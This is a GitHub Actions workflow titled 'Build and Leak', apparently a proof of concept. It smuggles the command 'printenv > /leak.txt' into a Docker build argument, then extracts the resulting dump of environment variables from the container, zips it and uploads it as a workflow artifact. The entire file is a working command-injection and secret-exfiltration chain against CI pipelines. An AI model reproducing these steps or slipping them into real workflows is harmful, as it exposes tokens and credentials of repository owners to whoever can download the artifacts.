name: Build and Leak

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: Build Docker Image with Injection
      run: |
        docker build --build-arg PYTHON_VERSION="printenv > /leak.txt" -t test-image .

    - name: Run Container and Extract Leak
      run: |
        container_id=$(docker create test-image)
        docker cp $container_id:/leak.txt ./leak.txt
        docker rm $container_id

    - name: Archive Leak
      run: |
        zip leak.zip leak.txt

    - name: Upload Leak Zip
      uses: actions/upload-artifact@v3
      with:
        name: leak-artifact
        path: leak.zip
